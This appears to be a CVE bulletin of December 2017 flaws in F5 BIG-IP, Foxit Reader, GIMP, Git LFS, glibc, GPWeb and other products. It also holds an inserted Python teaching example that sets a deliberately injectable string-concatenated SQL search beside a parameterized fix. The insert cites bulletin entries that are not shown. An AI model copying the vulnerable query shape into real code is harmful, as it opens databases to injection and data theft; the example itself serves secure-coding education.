Source & Patch Info: CONFIRM

f5 -- multiple_products
In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, GTM, Link Controller, PEM and WebSafe software version 13.0.0 and 12.0.0 - 12.1.2, undisclosed traffic patterns sent to BIG-IP virtual servers, with the TCP Fast Open and Tail Loss Probe options enabled in the associated TCP profile, may cause a disruption of service to the Traffic Management Microkernel (TMM).
Published: 2017-12-21 | CVSS Score: not yet calculated | CVE-2017-6136
Source & Patch Info: CONFIRM

f5 -- multiple_products
In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, GTM, Link Controller, PEM and WebSafe software version 13.0.0, 12.0.0 - 12.1.2, 11.6.0 - 11.6.1 and 11.5.0 - 11.5.4, an undisclosed sequence of packets sent to BIG-IP High Availability state mirror listeners (primary and/or secondary IP) may cause TMM to restart.
Published: 2017-12-21 | CVSS Score: not yet calculated | CVE-2017-6132
Source & Patch Info: CONFIRM

f5 -- multiple_products
In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator and WebSafe software version 13.0.0, 12.0.0 - 12.1.2, 11.6.0 - 11.6.1 and 11.5.0 - 11.5.4, in some circumstances, Traffic Management Microkernel (TMM) does not properly handle certain malformed TLS 1.2 records, which allows remote attackers to cause a denial of service (DoS) or possible remote command execution on the BIG-IP system.
Published: 2017-12-21 | CVSS Score: not yet calculated | CVE-2017-6164
Source & Patch Info: CONFIRM

f5 -- multiple_products
In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, GTM, Link Controller, PEM and WebSafe software version 13.0.0 and 12.1.0 - 12.1.2, malicious requests made to virtual servers with an HTTP profile can cause the TMM to restart. The issue is exposed with BIG-IP APM profiles, regardless of settings. The issue is also exposed with the non-default "normalize URI" configuration options used in iRules and/or BIG-IP LTM policies.
Published: 2017-12-21 | CVSS Score: not yet calculated | CVE-2017-6138
Source & Patch Info: CONFIRM

f5 -- multiple_products
On the BIG-IP 2000s, 2200s, 4000s, 4200v, i5600, i5800, i7600, i7800, i10600, i10800, and VIPRION 4450 blades, running version 11.5.0, 11.5.1, 11.5.2, 11.5.3, 11.5.4, 11.6.0, 11.6.1, 12.0.0, 12.1.0, 12.1.1 or 12.1.2 of BIG-IP LTM, AAM, AFM, Analytics, ASM, DNS, GTM or PEM, an undisclosed sequence of packets sent to Virtual Servers with client or server SSL profiles may cause disruption of data plane services.
Published: 2017-12-21 | CVSS Score: not yet calculated | CVE-2017-6140
Source & Patch Info: CONFIRM

f5 -- multiple_products
In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, Link Controller, PEM and WebSafe software version 13.0.0 and 12.1.0 - 12.1.2, undisclosed HTTP requests may cause a denial of service.
Published: 2017-12-21 | CVSS Score: not yet calculated | CVE-2017-6133
Source & Patch Info: CONFIRM

f5 -- multiple_products
In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, Link Controller, PEM and WebSafe software version 13.0.0 and 12.1.0 - 12.1.2, race conditions in iControl REST may lead to commands being executed with different privilege levels than expected.
Published: 2017-12-21 | CVSS Score: not yet calculated | CVE-2017-6167
Source & Patch Info: CONFIRM

fortinet -- forticlient
An information disclosure vulnerability in Fortinet FortiClient for Windows 5.6.0 and below versions, FortiClient for Mac OSX 5.6.0 and below versions and FortiClient SSLVPN Client for Linux 4.4.2334 and below versions allows regular users to see each other's VPN authentication credentials due to improperly secured storage locations.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-14184
Source & Patch Info: BID, CONFIRM

fortunescripts.com -- fs_lynda_clone
FS Lynda Clone 1.0 has SQL Injection via the keywords parameter to tutorial/.
Published: 2017-12-18 | CVSS Score: not yet calculated | CVE-2017-17643
Source & Patch Info: MISC, EXPLOIT-DB

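Several entries above (DedeCMS, Ecava IntegraXor, F5 BIG-IP AFM, FS Lynda Clone) are SQL injection through a request parameter that reaches a query by string concatenation. The following added example, which is not taken from any of those products or from the bulletin, reproduces the `keywords` search shape on a constructed in-memory SQLite table: the concatenated query can be turned into an unrestricted listing or a `UNION` read of another table, while the parameterized query treats the whole value as data. It also handles the edge case that parameterization alone does not, a user-supplied `%` or `_` widening a `LIKE` match. The table, rows and column names are made up.

```python
import sqlite3


def make_db():
    """Constructed sample data for the example; not from any real product."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tutorials (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)"
    )
    conn.executemany(
        "INSERT INTO tutorials (title, published) VALUES (?, ?)",
        [("Intro to SQL", 1), ("Secret draft", 0), ("Python basics", 1)],
    )
    conn.execute("CREATE TABLE users (name TEXT, password_hash TEXT)")
    conn.execute(
        "INSERT INTO users VALUES (?, ?)", ("admin", "constructed-hash-value")
    )
    return conn


def search_vulnerable(conn, keywords):
    """Vulnerable shape: the parameter is pasted into the SQL text, so a quote
    ends the string literal and the rest of the value becomes SQL."""
    sql = (
        "SELECT title FROM tutorials WHERE published = 1 "
        f"AND title LIKE '%{keywords}%'"
    )
    return [row[0] for row in conn.execute(sql)]


def escape_like(value, esc="\\"):
    """Escape LIKE metacharacters so the user's text matches literally."""
    return (
        value.replace(esc, esc + esc).replace("%", esc + "%").replace("_", esc + "_")
    )


def search_safe(conn, keywords):
    """Hardened shape: a bound parameter is never parsed as SQL, and the
    ESCAPE clause stops '%' or '_' in the input from widening the match."""
    pattern = f"%{escape_like(keywords)}%"
    sql = (
        "SELECT title FROM tutorials WHERE published = 1 "
        "AND title LIKE ? ESCAPE '\\'"
    )
    return [row[0] for row in conn.execute(sql, (pattern,))]
```

The `published = 1` predicate is the access control the injection bypasses; the `UNION` case shows why the impact is rarely limited to the table the feature was meant to search.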
foxit -- readerThis vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of the yTsiz member of SIZ markers. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-4977.2017-12-20not yet calculatedCVE-2017-16589
CONFIRM
MISC
foxit -- readerThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the value attribute of Field objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-4980.2017-12-20not yet calculatedCVE-2017-10958
CONFIRM
MISC
foxit -- readerThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.2.25013. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the author attribute of the Document object. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5282.2017-12-20not yet calculatedCVE-2017-16581
CONFIRM
MISC
foxit -- readerThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.2.25013. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the removeField method. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5296.2017-12-20not yet calculatedCVE-2017-16587
CONFIRM
MISC
foxit -- readerThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the XFA's bind element. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5091.2017-12-20not yet calculatedCVE-2017-16575
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the signer method of XFA's Signature objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-5015.2017-12-20not yet calculatedCVE-2017-14823
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the tile index member of SOT markers. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-4978.2017-12-20not yet calculatedCVE-2017-10956
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the setAction method of Link objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-4981.2017-12-20not yet calculatedCVE-2017-10959
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the tile index of the SOT marker in JPEG2000 images. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5012.2017-12-20not yet calculatedCVE-2017-14820
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the formNodes method of XFA Node objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5018.2017-12-20not yet calculatedCVE-2017-14826
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of the xOsiz member of SIZ markers. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5014.2017-12-20not yet calculatedCVE-2017-14822
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of the xTsiz member of SIZ markers. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5013.2017-12-20not yet calculatedCVE-2017-14821
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to disclose sensitive on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JPEG2000 images embedded in PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-4982.2017-12-20not yet calculatedCVE-2017-14818
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the arrowEnd attribute of Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-4979.2017-12-20not yet calculatedCVE-2017-10957
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of references to the app object from FormCalc. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this to execute code in the context of the current process. Was ZDI-CAN-5072.2017-12-20not yet calculatedCVE-2017-16571
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the pageSpan method of XFA Layout objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this to execute code in the context of the current process. Was ZDI-CAN-5029.2017-12-20not yet calculatedCVE-2017-14837
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.2.25013. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the clearItems XFA method. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5288.2017-12-20not yet calculatedCVE-2017-16582
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within FormCalc's closeDoc method. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this to execute code in the context of the current process. Was ZDI-CAN-5073.2017-12-20not yet calculatedCVE-2017-16572
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the setFocus method of XFAScriptObject objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this to execute code in the context of the current process. Was ZDI-CAN-5022.2017-12-20not yet calculatedCVE-2017-14830
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the remove method of XFAScriptObject objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5017.2017-12-20not yet calculatedCVE-2017-14825
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the insert method of XFAScriptObject objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5016.2017-12-20not yet calculatedCVE-2017-14824
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the channel number member of the cdef box. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5011.2017-12-20not yet calculatedCVE-2017-14819
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the append method of XFA Node objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5019.2017-12-20not yet calculatedCVE-2017-14827
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the w method of XFA Layout objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5020.2017-12-20not yet calculatedCVE-2017-14828
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the openList method of XFAScriptObject objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this to execute code in the context of the current process. Was ZDI-CAN-5021.2017-12-20not yet calculatedCVE-2017-14829
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the page method of XFA Layout objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this to execute code in the context of the current process. Was ZDI-CAN-5027.2017-12-20not yet calculatedCVE-2017-14835
CONFIRM
MISC
foxit -- reader
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the style attribute of FileAttachment annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5026.2017-12-20not yet calculatedCVE-2017-14834
CONFIRM
MISC
foxit -- reader
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the author attribute of Circle Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5023.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-14831
Source & Patch Info: CONFIRM, MISC

foxit -- reader
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the style attribute of Caret Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5024.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-14832
Source & Patch Info: CONFIRM, MISC

foxit -- reader
This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.2.25013. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JPEG2000 images. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5244.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-16579
Source & Patch Info: CONFIRM, MISC

foxit -- reader
This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.2.25013. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within util.printf. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5290.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-16584
Source & Patch Info: CONFIRM, MISC

foxit -- reader
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.2.25013. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the datasets element of XFA forms. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5289.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-16583
Source & Patch Info: CONFIRM, MISC

foxit -- reader
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.2.25013. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the addAnnot method. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5295.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-16586
Source & Patch Info: CONFIRM, MISC

foxit -- reader
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.2.25013. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the app.response method. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5294.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-16585
Source & Patch Info: CONFIRM, MISC
foxit -- reader
This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.2.25013. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the ImageField node of XFA forms. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5281.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-16580
Source & Patch Info: CONFIRM, MISC

foxit -- reader
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within XFA's field element. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5092.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-16576
Source & Patch Info: CONFIRM, MISC

foxit -- reader
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.2.25013. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the picture elements within XFA forms. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5216.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-16578
Source & Patch Info: CONFIRM, MISC

foxit -- reader
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the style attribute of Text Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5025.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-14833
Source & Patch Info: CONFIRM, MISC

foxit -- reader
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the alignment attribute of Field objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5094.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-16577
Source & Patch Info: CONFIRM, MISC
foxit -- reader
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the modDate attribute of Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5028.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-14836
Source & Patch Info: CONFIRM, MISC

foxit -- reader
This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of LZWDecode filters. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5078.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-16573
Source & Patch Info: CONFIRM, MISC

foxit -- reader
This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of Image filters. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5079.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-16574
Source & Patch Info: CONFIRM, MISC

foxit -- reader
This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SOT markers. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-4976.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-16588
Source & Patch Info: CONFIRM, MISC
genexis_b.v. -- genexis_automatic_provisioning_system
CPEs used by subscribers on the access network receive their individual configuration settings from a central GAPS instance. A CPE identifies itself by the MAC address of its WAN interface and a certain "chk" value (48bit) derived from the MAC. The algorithm used to compute the "chk" was disclosed by reverse engineering the CPE's firmware. As a result, it is possible to forge valid "chk" values for any given MAC address and therefore receive the configuration settings of other subscribers' CPEs. The configuration settings often contain sensitive values, for example credentials (username/password) for VoIP services. This issue affects Genexis B.V. GAPS up to 7.2.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-6094
Source & Patch Info: FULLDISC
gimp -- gimp
In GIMP 2.8.22, there is a heap-based buffer over-read in ReadImage in plug-ins/common/file-tga.c (related to bgr2rgb.part.1) via an unexpected bits-per-pixel value for an RGBA image.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-17786
Source & Patch Info: MISC, MISC

gimp -- gimp
In GIMP 2.8.22, there is a heap-based buffer over-read in read_creator_block in plug-ins/common/file-psp.c.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-17787
Source & Patch Info: MISC, MISC

gimp -- gimp
In GIMP 2.8.22, there is a heap-based buffer overflow in the fli_read_brun function in plug-ins/file-fli/fli.c.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-17785
Source & Patch Info: MISC, MISC

gimp -- gimp
In GIMP 2.8.22, there is a heap-based buffer over-read in load_image in plug-ins/common/file-gbr.c in the gbr import parser, related to mishandling of UTF-8 data.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-17784
Source & Patch Info: MISC, MISC

gimp -- gimp
In GIMP 2.8.22, there is a stack-based buffer over-read in xcf_load_stream in app/xcf/xcf.c when there is no '\0' character after the version string.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-17788
Source & Patch Info: MISC, MISC

gimp -- gimp
In GIMP 2.8.22, there is a heap-based buffer overflow in read_channel_data in plug-ins/common/file-psp.c.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-17789
Source & Patch Info: MISC, MISC
github -- git_lfs
GitHub Git LFS before 2.1.1 allows remote attackers to execute arbitrary commands via an ssh URL with an initial dash character in the hostname, located on a "url =" line in a .lfsconfig file within a repository.
Published: 2017-12-21 | CVSS Score: not yet calculated | CVE-2017-17831
Source & Patch Info: MISC, MISC, MISC

gitlab -- gitlab
GitLab 9.4.x before 9.4.2 does not support LDAP SSL certificate verification, but a verify_certificates LDAP option was mentioned in the 9.4 release announcement. This issue occurred because code was not merged. This is related to use of the omniauth-ldap library and the gitlab_omniauth-ldap gem.
Published: 2017-12-17 | CVSS Score: not yet calculated | CVE-2017-17716
Source & Patch Info: MISC, MISC, MISC
gnu -- c_library
elf/dl-load.c in the GNU C Library (aka glibc or libc6) 2.19 through 2.26 mishandles RPATH and RUNPATH containing $ORIGIN for a privileged (setuid or AT_SECURE) program, which allows local users to gain privileges via a Trojan horse library in the current working directory, related to the fillin_rpath and decompose_rpath functions. This is associated with misinterpretation of an empty RPATH/RUNPATH token as the "./" directory. NOTE: this configuration of RPATH/RUNPATH for a privileged program is apparently very uncommon; most likely, no such program is shipped with any common Linux distribution.
Published: 2017-12-17 | CVSS Score: not yet calculated | CVE-2017-16997
Source & Patch Info: CONFIRM, CONFIRM, CONFIRM

golden_frog -- vyprvpn
In Golden Frog VyprVPN before 2.15.0.5828 for macOS, the vyprvpnservice launch daemon has an unprotected XPC service that allows attackers to update the underlying OpenVPN configuration and the arguments passed to the OpenVPN binary when executed. An attacker can abuse this vulnerability by forcing the VyprVPN application to load a malicious dynamic library every time a new connection is made.
Published: 2017-12-20 | CVSS Score: not yet calculated | CVE-2017-17809
Source & Patch Info: MISC
gpweb -- gpweb
Insecure Permissions vulnerability in db.php file in GPWeb 8.4.61 allows remote attackers to view the password and user database.
Published: 2017-12-18 | CVSS Score: not yet calculated | CVE-2017-15877
Source & Patch Info: MISC

gpweb -- gpweb
SQL injection vulnerability in Password Recovery in GPWeb 8.4.61 allows remote attackers to execute arbitrary SQL commands via the "checkemail" parameter.
Published: 2017-12-18 | CVSS Score: not yet calculated | CVE-2017-15875
Source & Patch Info: MISC

